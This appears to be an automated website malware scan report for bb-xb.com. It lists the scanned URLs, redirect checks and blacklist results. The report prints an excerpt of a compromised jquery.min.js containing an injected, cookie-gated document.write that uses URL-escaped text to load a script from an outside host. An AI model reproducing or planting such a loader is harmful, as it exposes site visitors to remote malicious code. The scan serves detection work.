Scanned pages/files
| Request | Server response | Status |
http://www.bb-xb.com/ | 200 OK Content-Length: 15872 Content-Type: text/html | clean |
http://www.bb-xb.com/Public/js/jquery.min.js | 200 OK Content-Length: 55714 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.bb-xb.com/Public/js/check_form.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.bb-xb.com/test404page.js | 200 OK Content-Length: 1585 Content-Type: text/html | clean |
http://www.bb-xb.com/index.php/test404page.js | 200 OK Content-Length: 1585 Content-Type: text/html | clean |
http://www.bb-xb.com/index.php/ | 200 OK Content-Length: 19055 Content-Type: text/html | clean |
http://www.bb-xb.com/Public/js/change_pic_index.js | 200 OK Content-Length: 703 Content-Type: text/javascript | clean |
http://chat.53kf.com/kf.php?arg=hkwan&style=1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Dec 2014 12:38:00 GMT Location: http://tb.53kf.com/kf.php?arg=9007252&style=1 Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: SESSION_COOKIE=chat_1; path=/ | clean |
http://tb.53kf.com/kf.php?arg=9007252&style=1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 25 Dec 2014 12:38:07 GMT Location: http://www1.53kf.com/kf.php?arg=9007252&style=1 Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: SESSION_COOKIE=master2_1; path=/ | clean |
http://www1.53kf.com/kf.php?arg=9007252&style=1 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www1.53kf.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.bb-xb.com/Public/js/index_move_pic.js | 200 OK Content-Length: 2899 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bb-xb.com
Result:
GET / HTTP/1.1
Host: bb-xb.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bb-xb.com
Referer: http://www.google.com/search?q=bb-xb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bb-xb.com
Referer: http://www.google.com/search?q=bb-xb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bb-xb.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bb-xb.com/
Result: bb-xb.com is not infected or malware details are not published yet.
Result: bb-xb.com is not infected or malware details are not published yet.